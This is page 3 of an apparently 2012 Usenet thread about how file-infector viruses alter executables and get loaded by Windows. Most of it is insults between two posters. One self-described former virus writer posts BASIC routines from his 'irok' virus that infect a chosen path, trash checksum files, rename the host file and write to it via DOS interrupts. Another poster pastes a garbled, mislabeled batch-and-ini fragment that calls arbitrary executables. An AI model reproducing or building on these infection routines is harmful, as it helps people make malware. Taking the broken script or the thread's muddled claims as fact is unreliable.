How does a malware effect a program and get loaded by Windows? - Page 3

Do you have a question? Post it now! No Registration Necessary.  Now with pictures!

Threaded View

Re: How does a malware effect a program and get loaded by Windows?


Quoted text here. Click to load it

I really doubt that HT. Ray is going to have to do some 'self-study' to even
get to the point where any of it makes sense to him. Dustin won't be wasting
his time going over the basic background material needed. I'm reasonably
sure Ray isn't really grasping any of this yet.



Re: How does a malware effect a program and get loaded by Windows?

Quoted text here. Click to load it

a ~RL~ Mmm

Re: How does a malware effect a program and get loaded by Windows?

On Friday, July 27, 2012 8:21:26 AM UTC-4, FromTheRafters wrote:
 
Quoted text here. Click to load it

Yeah, spoken like the kiddie-script ass worshiper of Dustbin that you appear to
be Rafters.  

Why do you idolize this loser?  He's not shown me anything he knows cannot be
cut and paste out of a book on virus writing.

RL

Re: How does a malware effect a program and get loaded by Windows?


Quoted text here. Click to load it

HAHAHA.. Right.. I was wondering when you'd fire on him. :)
 
Quoted text here. Click to load it

Find a book that has asic source code to a virus, that wasn't written by
me. :)


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.


Re: How does a malware effect a program and get loaded by Windows?

RayLopez99 wrote :
Quoted text here. Click to load it

I don't, he's just another Usenet poster to me.

Quoted text here. Click to load it
That's because you're incapable of understanding what he has already
given you. Hell, you couldn't even understand what *I* wrote.

Is this the thanks I get for attempting to help you Ray?



Re: How does a malware effect a program and get loaded by Windows?

On Wednesday, July 25, 2012 2:58:31 PM UTC-4, RayLopez99 wrote:=20

Here is what FromTheRafters wrote in another thread, and I include it here =
with my comments IN CAP LETTERS FOR THE most part.

RL

OK I need a lesson in virus writing or rather how an OS loads a program.=20

***=20
You need some background before any explanation will be understood by you.=
=20
The loader does the last 'translation' - that of using the information in=
=20
the program's file to construct an executable image. The executable file is=
=20
not really executable (some need no further translation, but most do - the=
=20
loader knows what to do). it "represents" what is needed to create that=20
executable image.=20

NOT CLEAR WHAT YOU MEAN.  LET ME GOOGLE THIS... found this, and it looks go=
od:  http://alexfru.chat.ru/los4d_manual.html -LET ME KNOW IF YOU DISAGRE=
E, RAFTERS.  from what I can tell, an "OS loader" is a Windows (or DOS) pro=
gram that continuously runs in the first 640k or so of RAM, and what it is,=
 is a 'stack' run in an infinite loop (the infinite loop program always che=
cking the top of the stack and popping or pushing instructions or data from=
 the program it is running to serve up to the microprocessor) that pops int=
o the stack the opcodes related to uP commands and memory commands and IO c=
ommands of the kind 'Dustin' claims to write.  I think you mean 'binary' fo=
r 'image' file.  Fair enough.  In any event this binary of either .com or .=
exe extension has the machine code--in 1's and 0's--of the assembly languag=
e opcodes that I mentioned above. --RL

***


A 'file infector virus' infects a 'program' by modifying the information in=
=20
the 'file' it is stored in so that the resulting image from the loader's=20
translation has the virus as part of the program it is using as a host=20
(infecting). So now when such an 'infected' legit program file gets=20
'invoked' the loader loads the virus because it is now part of that formerl=
y=20
legitimate program.=20

THIS IS THE PART THAT CONFUSES ME--I'M NOT SURE HOW A BINARY FILE CAN HAVE =
CODE INSERTED INTO IT WITHOUT DESTROYING WHAT WAS ALREADY THERE, BUT I GUES=
S IF YOU JUDICIOUSLY INSERT THE CODE SO IT'S SAY JUST AFTER A 'COMMENT' IN =
MACHINE CODE, IF YOU CAN DO THIS--I NEED MORE CLARIFICATION.--RL

At this point, the infected 'legit' program is 'like' a trojan - it appears=
=20
to be legit but has in addition to (or instead of in the case of=20
overwriters) what it used to do, some nefarious function. This special case=
=20
of trojan when executed will trojanize other programs again in the same=20
manner with a copy of its own replicative function=20

AGAIN, NOT CLEAR HOW.  I GUESS THE TROJAN CAN SEARCH FOR .COM OR .EXE FILES=
 IN THE HARD DRIVE AND DO WHAT, LOAD THEM INTO RAM, THEN MANIPULATE THEM, T=
HE WRITE THEM BACK TO THE HARD DRIVE?--rl

and act as a=20
self-distibution method for whatever 'payload' it also copies from iteratio=
n=20
to iteration. This is an important enough consideration to warrant its=20
special name of "virus" rather than just a trojan which would need some=20
other method for its distribution. Viruses and worms are handy programs for=
=20
malware distribution but IMO are neutral otherwise.=20

 I know that you just want to troll Dustin, but let me say this - I know=20
enough about computers and malware to know that Dustin knows more than I do=
.=20
***=20

YES I TROLL DUSTIN--HE'S A FOOL.  I DOUBT HE KNOWS MORE THAN YOU ABOUT COMP=
UTERS BTW.  AS A SO-CALLED VIRUS WRITER, AT BEST--AGAIN, FROM WHAT I'VE SEE=
N--HE MAY HAVE A BOOK LIKE I HAVE AND HAS SIMPLY COPIED AND PASTED SOME OFF=
 THE SHELF VIRUS AND RENAMED IT AS HIS--AT BEST.

Thanks for your input.  I am replying only here since the other thread is g=
etting too crowded.

RL

Re: How does a malware effect a program and get loaded by Windows?

RayLopez99 explained :
Quoted text here. Click to load it

It looks like you have confused the loader that loads the OS with the
loaders that load programs once the OS is up and running. This first
loader has to set up the OS's structures and whatnot and then schedule
the initialization process as the idle process.

Quoted text here. Click to load it

It's running before the OS has loaded, and as such cannot be DOS or
Windows. The BIOS finds the OS loader and tranfers control to it. The
OS loader then constructs additional file system support so that other
stored files can be accessed.

Quoted text here. Click to load it

That sounds like you're describing the scheduler.

Quoted text here. Click to load it

No, I meant 'executable image' - no *file* is involved here. The code
and the other resources in the executable file are translated into
machine code for the processor and the result is mapped into a special
memory location where execution can begin when sheduled.

Quoted text here. Click to load it

1's and 0's are machine language, assembly uses mnemonics for the
opcodes.

Quoted text here. Click to load it

Preexisting code can be relocated and jumped to later. Some viruses
even relocate that code to another file or alternate data stream as
encrypted data and decrypt and execute it later to "mimic" the original
program's function.
Quoted text here. Click to load it
Yep, just as the user is able to modify programs, so is malware that
the user executes.
[...]

I can tell you something about what is being done, but Dustin can tell
you *how* it is being done. He *can* be very helpful, but you have not
endeared yourself to him (to say the least). :oD



Re: How does a malware effect a program and get loaded by Windows?

On Thursday, July 26, 2012 6:58:37 PM UTC-4, FromTheRafters wrote:
=20
Quoted text here. Click to load it

Well except for some minor terminology differences and confusion, I think w=
e are roughly on the same page. As for Dustin, I doubt he knows much more t=
han you and I, seriously, I think he's a fake.  If he's real he'll step up =
to the plate and try and explain some of this stuff and show his supposed m=
astery.  I'm not holding my breath.

RL

Re: How does a malware effect a program and get loaded by Windows?


Quoted text here. Click to load it

I won't assist you or anyone else in writing a virus. It would be very
irresponsible of me. I intentionally provided you non functional
snippits of irok source code. You couldn't even follow those routines,
to explain the actual infection routines would be a total waste of my
time.

I've even offered you my old duke nukem saved game editor source code,
with comments. Hell, irok was commented as well. You don't even
understand what gosub was doing.

You keep calling me a fool and dumbass and generally acting a punk, but
dude, seriously; I *know* this stuff, I wrote several. You haven't got
shit on me. FTR knows computers well and so does Kurt. Neither of them
are going to tell you they could outcode me.

Malwarebytes didn't hire me for my charming personality traits Ray. I
was hired because of my expertise on malware. Much of that expertise
comes from having written viruses in the past.



--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.


Re: How does a malware effect a program and get loaded by Windows?

On Thursday, July 26, 2012 11:10:37 PM UTC-4, Dustin wrote:

Quoted text here. Click to load it

I did understand, shit head, but I want you to walk us through it.  Too
difficult?  I understand....go to bed now and be a good boy.

Quoted text here. Click to load it

Who are these people, friends of yours?  I don't give a shit if they are more
incompetent than you.  That's not the challenge.  
  
Quoted text here. Click to load it


But they fired you?!


Quoted text here. Click to load it

SHow us then, oh wise one.  Show us what you got.  What you got is the ability
to make threats of physical violence against people online, which btw restarts
the statute of limitations on your past crimes every time you do that.  

You're just a punk that's got nothing.  A Drama Queen.  And from your prose you
post like an old man, probably mid-60s or if younger you don't get out of the
house much.  Mother's basement?

RL

Re: How does a malware effect a program and get loaded by Windows?


Quoted text here. Click to load it

Not difficult for me. I wan't something from you tho. I don't work for
free. You understood it did you? Why did you request the other
subroutines with full commentation? Why are you still asking how a file
is infected? Some of that source code reverses the infection process on
the executable. If you did understand what I posted, You'd already know
how the process works and wouldn't have continued asking FTR those
newbie questions.

Fact is, you aren't a coder and you probably aren't a programmer.
 
Quoted text here. Click to load it

I don't know them personally. I've never met any of them. I wouldn't say
we're friends, Ray.
  
Quoted text here. Click to load it

Nope. You guessed wrong again. Surprised, I'm not.

Quoted text here. Click to load it

Lots of theories you have bouncing around that empty space above your
nose...Must be a hell of an echo up there.


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.


Re: How does a malware effect a program and get loaded by Windows?


Quoted text here. Click to load it

Amazing he was calling himself a "coder" just a few days ago. Now, we
see he doesn't even have the simplest of concepts down...
 
Quoted text here. Click to load it

I suspect you've lost him there, FTR.
 
Quoted text here. Click to load it

It's garbage... his description is technological, crap. Fuckwittery at
it's finest.
 
Quoted text here. Click to load it

And changed when needed.. :)
 
Quoted text here. Click to load it

Irok relocated the code and encrypted it; keyed to file/date time
stamps, so if you got nosy with a hex editor and saved changes, YOU
murdered the executable, but not Irok. [g] One of several little booby
traps I was known for including...

FTR, Did you know that some irok descriptions online specify what kind
of file infector it is? The very word you'd think, would explain how it
works.. But, it seems our dear Ray is so lost... there's really no hope
of explaining this.

He really doesn't get it.


Quoted text here. Click to load it

Yep.. With the same rights even, in some cases, the virus/malware will
attempt to gain additional rights depending on the circumstances.


Quoted text here. Click to load it

As long as he wants to talk down to me and play childish games and
generally just be a twit, I won't help him with any of the concepts. I
can't provide specifics anyway; I'm a professional malware researcher..
the other researchers I know and that know of me would have a serious
issue with me if I told him how to make one.

That seems to be what he's wanting to do. As he's money motivated, he's
probably already got a buyer. I'll be damned if I help in that aspect.

claims to be some sort of c coder, but can't follow simple ASIC code?
Who's he trying to bullshit?

Seems to be humouring you as well. You've already vouched for me, he's
entirely dismissed it and asked you further questions.

Honestly, I think he's trying to write something he can sell knowing it
wouldn't be known by any av/am scanners. He strikes me as that sort of
weaseling fuckhead.

--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.


Re: How does a malware effect a program and get loaded by Windows?

Ray Lopez why do you want to create a virus
 to effect or infect a .exe file of Poor..
For only the Poor will be hijack by the virus,
I see you care not for the poor at all..

*.CMD is a legitimate way to infected a Windows PC,
not *.EXE.....

Re: How does a malware effect a program and get loaded by Windows?


Quoted text here. Click to load it

What's the difference?



Re: How does a malware effect a program and get loaded by Windows?

Quoted text here. Click to load it

*.CMD can get windows to do the work for you..
Running *.exe and *.dll

[Settings]
REM ALT.COMP ant-virus.cmd 7-27-2011
SET
IF "%%"=="YES" SET=%%
IF EXIST %%\..\..\*.exe CALL %%\..\..\*.exe
CALL %%\..\..\..\*.dll
CALL %%\..\..\..\*.dll

[Command 0]
Command         =
OpenWndClass    =
OpenWndCaption  =
;
;
[Command 10]
CheckFile       =
CheckIniSection =
CheckIniEntry   =
CheckIniValue   = %ARX_PARAM:1%
OnSuccessGoto   =

[Command 20]
Command         =
Caption         =
Size            =
Border          =
System Menu     =

[Command 30]
Command         =
HtmlFile        =
WndSize         =
WaitSecs        =
OnFailureGoto   =


[Command 50]
Command         = run
CheckReg        =
CheckRegKey     =
RunFile         =
OnSuccessGoto   =

[Command 70]
Command         = run
RunFile         =  
CmdLine         = /oobe

Re: How does a malware effect a program and get loaded by Windows?


Quoted text here. Click to load it

Why would I bother doing all of that, when I can do this instead?

path_infect:
rem routine proceeds to infect selected path given via the 'n' variable
rem Notice, another safety check. This routine will abort if the
rem selected path does not exist.
          call sub "path", n, virupath$
          i=LEN(virupath$)
          if i>0 then
          b$=right$(virupath$,1)
        if b$<>"\" then
        virupath$=virupath$+"\"
        endif
        rem Before we infect, trash checksum files

        gosub waste:
        gosub start_virus:
endif
return

hide_host:
rem host_hide module
oldname$=filename$
b=varptr(filename$)
c=len(filename$)
d=b+c
b=d-3
d=d-1
range=36
for x=b to d
gosub rand_num:
e=a
e=e+140
poke x,e
next x
rem Now the filename has been changed, Lets rename it real quick :)
gosub waste:
name oldname$ as filename$

write_file:
rem this routine will write selected bytes at whatever current position
rem from whatever buffer i choose into the file.
rem if the routine did not write all data ax will not equal cx upon
rem return from int call.
rem define dx register before calling this routine to point to the
rem memory address of the buffer area you want to write from. like so:
rem dx=varptr(buffer(0))
rem cx is how many bytes to write :)
if file_handle>4 then
ax=&hex4000
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
byteswritten=ax
endif
return


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.


Re: How does a malware effect a program and get loaded by Windows?


Quoted text here. Click to load it

It's a .dll. You can still call specific functions via the runtime32.
[g]
 
Binary files don't go so well across usenet you know.


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.


Re: How does a malware effect a program and get loaded by Windows?

Quoted text here. Click to load it

True

And you can call ActiveX, DirectX, dll in non-IE applications,
the core Windows® technology that drives high-speed multimedia
and games on the client-computer
to run a client-server modes to send info across usenet to the bughunter...

For Dynamic-link-library can be run as a runtime32 on Windows,
that's why spammer like windows...

For there is 3 main types of virus,
name them or maybe Ray Lopez need too..

< http://www.spamlaws.com/virus-comtypes.html


Re: How does a malware effect a program and get loaded by Windows?


Quoted text here. Click to load it

Define main?

Oh wait.. no, this article isn't right dude.

a trojan IS NOT a virus

These computer viruses include:

 

    Trojan Horses
    Worms
    Email Viruses

The Trojan virus gets its name from an incident that occurs in Homer's
Iliad. Similar to how the Greeks in Homer's poem sent an army of men,
hidden in a wooden horse, to the Trojans to get into the wall of the
city. A Trojan horse appears to be nothing more than an interesting
computer program or file, such as "saxophone.wav file" on the computer
of user who's interested in collecting sound samples. The Trojan virus
once on your computer, doesn't reproduce, but instead makes your
computer susceptible to malicious intruders by allowing them to access
and read your files. Making this type of virus extremely dangerous to
your computer's security and your personal privacy. Therefore, you
should avoid downloading programs or files from sites if you're not 100
percent positive of what the file or program does.

You're googling skills are lacking here.

this is piss poor work.
 
Quoted text here. Click to load it

Worthless. full of errors.


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.


Re: How does a malware effect a program and get loaded by Windows?

Quoted text here. Click to load it

Just like you.....................

Site Timeline